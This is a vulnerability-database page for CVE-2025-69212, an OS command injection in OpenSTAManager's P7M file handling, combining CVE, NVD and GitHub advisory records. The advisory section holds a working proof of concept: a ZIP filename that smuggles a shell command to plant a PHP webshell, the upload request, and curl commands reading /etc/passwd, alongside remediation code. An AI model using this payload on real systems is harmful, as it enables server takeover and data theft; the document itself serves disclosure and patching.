CVE-2025-69212 (GCVE-0-2025-69212)
Vulnerability from cvelistv5 – Published: 2026-02-06 18:12 – Updated: 2026-02-09 15:29
VLAI
Title
OpenSTAManager has an OS Command Injection in P7M File Processing
Summary
OpenSTAManager is an open source management software for technical assistance and invoicing. In 2.9.8 and earlier, a critical OS Command Injection vulnerability exists in the P7M (signed XML) file decoding functionality. An authenticated attacker can upload a ZIP file containing a .p7m file with a malicious filename to execute arbitrary system commands on the server.
Severity
SSVC
Exploitation: none
Automatable: no
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
- CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Assigner
References
1 reference
| URL | Tags |
|---|---|
| https://github.com/devcode-it/openstamanager/secu… | x_refsource_CONFIRM |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| devcode-it | openstamanager |
Affected:
<= 2.9.8
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-69212",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-02-09T15:20:50.259667Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-02-09T15:29:00.443Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "openstamanager",
"vendor": "devcode-it",
"versions": [
{
"status": "affected",
"version": "\u003c= 2.9.8"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "OpenSTAManager is an open source management software for technical assistance and invoicing. In 2.9.8 and earlier, a critical OS Command Injection vulnerability exists in the P7M (signed XML) file decoding functionality. An authenticated attacker can upload a ZIP file containing a .p7m file with a malicious filename to execute arbitrary system commands on the server."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 9.4,
"baseSeverity": "CRITICAL",
"privilegesRequired": "LOW",
"subAvailabilityImpact": "HIGH",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "HIGH",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-02-06T18:12:38.391Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-25fp-8w8p-mx36",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-25fp-8w8p-mx36"
}
],
"source": {
"advisory": "GHSA-25fp-8w8p-mx36",
"discovery": "UNKNOWN"
},
"title": "OpenSTAManager has an OS Command Injection in P7M File Processing"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-69212",
"datePublished": "2026-02-06T18:12:38.391Z",
"dateReserved": "2025-12-29T15:00:37.380Z",
"dateUpdated": "2026-02-09T15:29:00.443Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2025-69212",
"date": "2026-06-29",
"epss": "0.01755",
"percentile": "0.7511"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2025-69212\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-02-06T19:16:07.373\",\"lastModified\":\"2026-06-17T10:00:17.903\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"OpenSTAManager is an open source management software for technical assistance and invoicing. In 2.9.8 and earlier, a critical OS Command Injection vulnerability exists in the P7M (signed XML) file decoding functionality. An authenticated attacker can upload a ZIP file containing a .p7m file with a malicious filename to execute arbitrary system commands on the server.\"},{\"lang\":\"es\",\"value\":\"OpenSTAManager es un software de gesti\u00f3n de c\u00f3digo abierto para asistencia t\u00e9cnica y facturaci\u00f3n. En la versi\u00f3n 2.9.8 y anteriores, existe una vulnerabilidad cr\u00edtica de inyecci\u00f3n de comandos del sistema operativo en la funcionalidad de decodificaci\u00f3n de archivos P7M (XML firmado). Un atacante autenticado puede cargar un archivo ZIP que contenga un archivo .p7m con un nombre de archivo malicioso para ejecutar comandos arbitrarios del sistema en el servidor.\"}],\"affected\":[{\"source\":\"security-advisories@github.com\",\"affectedData\":[{\"vendor\":\"devcode-it\",\"product\":\"openstamanager\",\"versions\":[{\"version\":\"\u003c= 2.9.8\",\"status\":\"affected\"}]}]}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":9.4,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"HIGH\",\"vulnAvailabilityImpact\":\"HIGH\",\"subConfidentialityImpact\":\"HIGH\",\"subIntegrityImpact\":\"HIGH\",\"subAvailabilityImpact\":\"HIGH\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.9}],\"ssvcV203\":[{\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"ssvcData\":{\"timestamp\":\"2026-02-09T15:20:50.259667Z\",\"id\":\"CVE-2025-69212\",\"options\":[{\"exploitation\":\"none\"},{\"automatable\":\"no\"},{\"technicalImpact\":\"total\"}],\"role\":\"CISA Coordinator\",\"version\":\"2.0.3\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-78\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:devcode:openstamanager:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"2.9.8\",\"matchCriteriaId\":\"42CFDCCE-817A-4017-8C56-ECC90B1CF7A1\"}]}]}],\"references\":[{\"url\":\"https://github.com/devcode-it/openstamanager/security/advisories/GHSA-25fp-8w8p-mx36\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-69212\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-02-09T15:20:50.259667Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-02-09T15:20:51.264Z\"}}], \"cna\": {\"title\": \"OpenSTAManager has an OS Command Injection in P7M File Processing\", \"source\": {\"advisory\": \"GHSA-25fp-8w8p-mx36\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 9.4, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"LOW\", \"subIntegrityImpact\": \"HIGH\", \"vulnIntegrityImpact\": \"HIGH\", \"subAvailabilityImpact\": \"HIGH\", \"vulnAvailabilityImpact\": \"HIGH\", \"subConfidentialityImpact\": \"HIGH\", \"vulnConfidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"devcode-it\", \"product\": \"openstamanager\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c= 2.9.8\"}]}], \"references\": [{\"url\": \"https://github.com/devcode-it/openstamanager/security/advisories/GHSA-25fp-8w8p-mx36\", \"name\": \"https://github.com/devcode-it/openstamanager/security/advisories/GHSA-25fp-8w8p-mx36\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"OpenSTAManager is an open source management software for technical assistance and invoicing. In 2.9.8 and earlier, a critical OS Command Injection vulnerability exists in the P7M (signed XML) file decoding functionality. An authenticated attacker can upload a ZIP file containing a .p7m file with a malicious filename to execute arbitrary system commands on the server.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-78\", \"description\": \"CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-02-06T18:12:38.391Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-69212\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-02-09T15:29:00.443Z\", \"dateReserved\": \"2025-12-29T15:00:37.380Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-02-06T18:12:38.391Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2025-69212
Vulnerability from fkie_nvd - Published: 2026-02-06 19:16 - Updated: 2026-06-17 10:00
Severity
Summary
OpenSTAManager is an open source management software for technical assistance and invoicing. In 2.9.8 and earlier, a critical OS Command Injection vulnerability exists in the P7M (signed XML) file decoding functionality. An authenticated attacker can upload a ZIP file containing a .p7m file with a malicious filename to execute arbitrary system commands on the server.
References
| URL | Tags | ||
|---|---|---|---|
| security-advisories@github.com | https://github.com/devcode-it/openstamanager/security/advisories/GHSA-25fp-8w8p-mx36 | Exploit, Vendor Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| devcode | openstamanager | * |
{
"affected": [
{
"affectedData": [
{
"product": "openstamanager",
"vendor": "devcode-it",
"versions": [
{
"status": "affected",
"version": "\u003c= 2.9.8"
}
]
}
],
"source": "security-advisories@github.com"
}
],
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:devcode:openstamanager:*:*:*:*:*:*:*:*",
"matchCriteriaId": "42CFDCCE-817A-4017-8C56-ECC90B1CF7A1",
"versionEndIncluding": "2.9.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "OpenSTAManager is an open source management software for technical assistance and invoicing. In 2.9.8 and earlier, a critical OS Command Injection vulnerability exists in the P7M (signed XML) file decoding functionality. An authenticated attacker can upload a ZIP file containing a .p7m file with a malicious filename to execute arbitrary system commands on the server."
},
{
"lang": "es",
"value": "OpenSTAManager es un software de gesti\u00f3n de c\u00f3digo abierto para asistencia t\u00e9cnica y facturaci\u00f3n. En la versi\u00f3n 2.9.8 y anteriores, existe una vulnerabilidad cr\u00edtica de inyecci\u00f3n de comandos del sistema operativo en la funcionalidad de decodificaci\u00f3n de archivos P7M (XML firmado). Un atacante autenticado puede cargar un archivo ZIP que contenga un archivo .p7m con un nombre de archivo malicioso para ejecutar comandos arbitrarios del sistema en el servidor."
}
],
"id": "CVE-2025-69212",
"lastModified": "2026-06-17T10:00:17.903",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 9.4,
"baseSeverity": "CRITICAL",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "HIGH",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "HIGH",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "security-advisories@github.com",
"type": "Secondary"
}
],
"ssvcV203": [
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"ssvcData": {
"id": "CVE-2025-69212",
"options": [
{
"exploitation": "none"
},
{
"automatable": "no"
},
{
"technicalImpact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-02-09T15:20:50.259667Z",
"version": "2.0.3"
}
}
]
},
"published": "2026-02-06T19:16:07.373",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-25fp-8w8p-mx36"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-78"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-25FP-8W8P-MX36
Vulnerability from github – Published: 2026-02-06 17:59 – Updated: 2026-02-06 22:11
VLAI
Summary
OpenSTAManager has an OS Command Injection in P7M File Processing
Details
Summary
A critical OS Command Injection vulnerability exists in the P7M (signed XML) file decoding functionality. An authenticated attacker can upload a ZIP file containing a .p7m file with a malicious filename to execute arbitrary system commands on the server.
Vulnerable Code
File: src/Util/XML.php:100
public static function decodeP7M($file)
{
$directory = pathinfo($file, PATHINFO_DIRNAME);
$content = file_get_contents($file);
$output_file = $directory.'/'.basename($file, '.p7m');
try {
if (function_exists('exec')) {
// VULNERABLE - No input sanitization!
exec('openssl smime -verify -noverify -in "'.$file.'" -inform DER -out "'.$output_file.'"', $output, $cmd);
The Problem:
- The $file parameter is passed directly into exec() without sanitization
- Although wrapped in double quotes, an attacker can escape them
- The filename comes from uploaded ZIP archives (user-controlled)
Attack Vector
Entry Points:
-
plugins/importFE_ZIP/actions.php:126 (when automatic import is enabled)
php foreach ($files_xml as $xml) { if (string_ends_with($xml, '.p7m')) { $file = XML::decodeP7M($directory.'/'.$xml); // $xml from ZIP! -
plugins/importFE/src/FatturaElettronica.php:56 (constructor)
php if (string_ends_with($name, '.p7m')) { $file = XML::decodeP7M($this->file); // $name from user input!
Attack Flow:
- Attacker creates ZIP with malicious filename
- Upload ZIP via importFE_ZIP plugin
- Application extracts ZIP and iterates files
- For
.p7mfiles,decodeP7M()is called - Malicious filename is injected into
exec()command - Arbitrary command executes as web server user
Proof of Concept
⚠️ IMPORTANT NOTE: PHP's ZipArchive::extractTo() splits filenames on / character. Payload must NOT contain / in commands. Use cd directory && command instead of absolute paths.
Step 1: Create Malicious ZIP
import zipfile
cmd = "cd files && echo '<?php system($_GET[\"c\"]); ?>' > SHELL.php"
malicious_filename = f'invoice.p7m";{cmd};echo ".p7m'
with zipfile.ZipFile('exploit.zip', 'w') as zf:
zf.writestr(malicious_filename, b"DUMMY_P7M_CONTENT")
Step 2: Upload ZIP
POST /actions.php HTTP/1.1
Host: localhost:8081
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBKunENXxjEx5VrRc
Cookie: PHPSESSID=10fcc3c3cdccf2466ada216d5839084b
------WebKitFormBoundaryBKunENXxjEx5VrRc
Content-Disposition: form-data; name="blob1"; filename="exploit.zip"
Content-Type: application/zip
[ZIP CONTENT]
------WebKitFormBoundaryBKunENXxjEx5VrRc--
Content-Disposition: form-data; name="op"
save
------WebKitFormBoundaryBKunENXxjEx5VrRc
Content-Disposition: form-data; name="id_module"
14
------WebKitFormBoundaryBKunENXxjEx5VrRc
Content-Disposition: form-data; name="id_plugin"
48
------WebKitFormBoundaryBKunENXxjEx5VrRc--
Step 3: Exploitation Result
Response (500 error is expected - XML parsing fails AFTER command execution):
HTTP/1.1 500 Internal Server Error
{"error":{"type":"Exception","message":"Start tag expected, '<' not found"}}
Verification - Webshell Created:
Step 4: Remote Code Execution
Webshell is publicly accessible without authentication:
$ curl "http://localhost:8081/files/SHELL.php?c=id"
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ curl "http://localhost:8081/files/SHELL.php?c=cat+/etc/passwd"
[Full /etc/passwd output]
Impact
- Remote Code Execution: Full server compromise
- Data Exfiltration: Access to all application data and database
- Privilege Escalation: Potential escalation if web server runs with elevated privileges
- Persistence: Install backdoors and maintain access
- Lateral Movement: Pivot to other systems on the network
Prerequisites
- Authenticated user with access to invoice import functionality
Remediation
Input Sanitization
public static function decodeP7M($file)
{
// Validate that file path doesn't contain shell metacharacters
if (preg_match('/[;&|`$(){}\\[\\]<>]/', $file)) {
throw new \Exception('Invalid file path');
}
// Better: use escapeshellarg()
$safe_file = escapeshellarg($file);
$safe_output = escapeshellarg($output_file);
exec("openssl smime -verify -noverify -in $safe_file -inform DER -out $safe_output", $output, $cmd);
}
or
Validate Filename Before Processing
// In the upload handler, validate filenames from ZIP
foreach ($files_xml as $xml) {
// Only allow alphanumeric, dots, dashes, underscores
if (!preg_match('/^[a-zA-Z0-9._-]+$/', $xml)) {
continue; // Skip invalid filenames
}
if (string_ends_with($xml, '.p7m')) {
$file = XML::decodeP7M($directory.'/'.$xml);
}
}
Credit
Discovered by: Łukasz Rybak
Severity
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "devcode-it/openstamanager"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "2.9.8"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-69212"
],
"database_specific": {
"cwe_ids": [
"CWE-78"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-06T17:59:37Z",
"nvd_published_at": "2026-02-06T19:16:07Z",
"severity": "CRITICAL"
},
"details": "## Summary\nA critical OS Command Injection vulnerability exists in the P7M (signed XML) file decoding functionality. An authenticated attacker can upload a ZIP file containing a .p7m file with a malicious filename to execute arbitrary system commands on the server.\n\n\n## Vulnerable Code\n**File:** `src/Util/XML.php:100`\n\n```php\npublic static function decodeP7M($file)\n{\n $directory = pathinfo($file, PATHINFO_DIRNAME);\n $content = file_get_contents($file);\n\n $output_file = $directory.\u0027/\u0027.basename($file, \u0027.p7m\u0027);\n\n try {\n if (function_exists(\u0027exec\u0027)) {\n // VULNERABLE - No input sanitization!\n exec(\u0027openssl smime -verify -noverify -in \"\u0027.$file.\u0027\" -inform DER -out \"\u0027.$output_file.\u0027\"\u0027, $output, $cmd);\n```\n\n**The Problem:**\n- The `$file` parameter is passed directly into `exec()` without sanitization\n- Although wrapped in double quotes, an attacker can escape them\n- The filename comes from uploaded ZIP archives (user-controlled)\n\n## Attack Vector\n\n### Entry Points:\n1. **plugins/importFE_ZIP/actions.php:126** (when automatic import is enabled)\n ```php\n foreach ($files_xml as $xml) {\n if (string_ends_with($xml, \u0027.p7m\u0027)) {\n $file = XML::decodeP7M($directory.\u0027/\u0027.$xml); // $xml from ZIP!\n ```\n\n2. **plugins/importFE/src/FatturaElettronica.php:56** (constructor)\n ```php\n if (string_ends_with($name, \u0027.p7m\u0027)) {\n $file = XML::decodeP7M($this-\u003efile); // $name from user input!\n ```\n\n### Attack Flow:\n1. Attacker creates ZIP with malicious filename\n2. Upload ZIP via importFE_ZIP plugin\n3. Application extracts ZIP and iterates files\n4. For `.p7m` files, `decodeP7M()` is called\n5. Malicious filename is injected into `exec()` command\n6. Arbitrary command executes as web server user\n\n## Proof of Concept\n\n**\u26a0\ufe0f IMPORTANT NOTE:** PHP\u0027s `ZipArchive::extractTo()` splits filenames on `/` character. Payload must NOT contain `/` in commands. Use `cd directory \u0026\u0026 command` instead of absolute paths.\n\n### Step 1: Create Malicious ZIP\n\n```python\nimport zipfile\n\ncmd = \"cd files \u0026\u0026 echo \u0027\u003c?php system($_GET[\\\"c\\\"]); ?\u003e\u0027 \u003e SHELL.php\"\nmalicious_filename = f\u0027invoice.p7m\";{cmd};echo \".p7m\u0027\n\nwith zipfile.ZipFile(\u0027exploit.zip\u0027, \u0027w\u0027) as zf:\n zf.writestr(malicious_filename, b\"DUMMY_P7M_CONTENT\")\n```\n\n### Step 2: Upload ZIP\n\n```http\nPOST /actions.php HTTP/1.1\nHost: localhost:8081\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryBKunENXxjEx5VrRc\nCookie: PHPSESSID=10fcc3c3cdccf2466ada216d5839084b\n\n------WebKitFormBoundaryBKunENXxjEx5VrRc\nContent-Disposition: form-data; name=\"blob1\"; filename=\"exploit.zip\"\nContent-Type: application/zip\n\n[ZIP CONTENT]\n------WebKitFormBoundaryBKunENXxjEx5VrRc--\nContent-Disposition: form-data; name=\"op\"\n\nsave\n\n------WebKitFormBoundaryBKunENXxjEx5VrRc\nContent-Disposition: form-data; name=\"id_module\"\n\n14\n------WebKitFormBoundaryBKunENXxjEx5VrRc\nContent-Disposition: form-data; name=\"id_plugin\"\n\n48\n------WebKitFormBoundaryBKunENXxjEx5VrRc--\n```\n\u003cimg width=\"2539\" height=\"809\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f39cf6ad-9e8d-41de-866e-e01ec2064fd1\" /\u003e\n\n\u003cimg width=\"1543\" height=\"659\" alt=\"image\" src=\"https://github.com/user-attachments/assets/41fbd038-0bce-4b1c-bdc3-8ddcf3bf13be\" /\u003e\n\n### Step 3: Exploitation Result\n\n**Response (500 error is expected - XML parsing fails AFTER command execution):**\n```http\nHTTP/1.1 500 Internal Server Error\n{\"error\":{\"type\":\"Exception\",\"message\":\"Start tag expected, \u0027\u003c\u0027 not found\"}}\n```\n\n**Verification - Webshell Created:**\n\n\u003cimg width=\"1111\" height=\"239\" alt=\"image\" src=\"https://github.com/user-attachments/assets/d2e36cf3-c438-4509-be46-36d5c6f3e0d1\" /\u003e\n\n### Step 4: Remote Code Execution\n\n**Webshell is publicly accessible without authentication:**\n\n```bash\n$ curl \"http://localhost:8081/files/SHELL.php?c=id\"\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n\n$ curl \"http://localhost:8081/files/SHELL.php?c=cat+/etc/passwd\"\n[Full /etc/passwd output]\n```\n\u003cimg width=\"698\" height=\"475\" alt=\"image\" src=\"https://github.com/user-attachments/assets/7ee4630b-95a8-450c-bdce-d6f703c8168d\" /\u003e\n\n\n## Impact\n\n- **Remote Code Execution:** Full server compromise\n- **Data Exfiltration:** Access to all application data and database\n- **Privilege Escalation:** Potential escalation if web server runs with elevated privileges\n- **Persistence:** Install backdoors and maintain access\n- **Lateral Movement:** Pivot to other systems on the network\n\n## Prerequisites\n\n- Authenticated user with access to invoice import functionality\n\n## Remediation\n\n### Input Sanitization\n\n```php\npublic static function decodeP7M($file)\n{\n // Validate that file path doesn\u0027t contain shell metacharacters\n if (preg_match(\u0027/[;\u0026|`$(){}\\\\[\\\\]\u003c\u003e]/\u0027, $file)) {\n throw new \\Exception(\u0027Invalid file path\u0027);\n }\n\n // Better: use escapeshellarg()\n $safe_file = escapeshellarg($file);\n $safe_output = escapeshellarg($output_file);\n\n exec(\"openssl smime -verify -noverify -in $safe_file -inform DER -out $safe_output\", $output, $cmd);\n}\n```\nor\n\n### Validate Filename Before Processing\n\n```php\n// In the upload handler, validate filenames from ZIP\nforeach ($files_xml as $xml) {\n // Only allow alphanumeric, dots, dashes, underscores\n if (!preg_match(\u0027/^[a-zA-Z0-9._-]+$/\u0027, $xml)) {\n continue; // Skip invalid filenames\n }\n\n if (string_ends_with($xml, \u0027.p7m\u0027)) {\n $file = XML::decodeP7M($directory.\u0027/\u0027.$xml);\n }\n}\n```\n\n\n## Credit\nDiscovered by: \u0141ukasz Rybak",
"id": "GHSA-25fp-8w8p-mx36",
"modified": "2026-02-06T22:11:47Z",
"published": "2026-02-06T17:59:37Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-25fp-8w8p-mx36"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69212"
},
{
"type": "PACKAGE",
"url": "https://github.com/devcode-it/openstamanager"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"type": "CVSS_V4"
}
],
"summary": "OpenSTAManager has an OS Command Injection in P7M File Processing"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…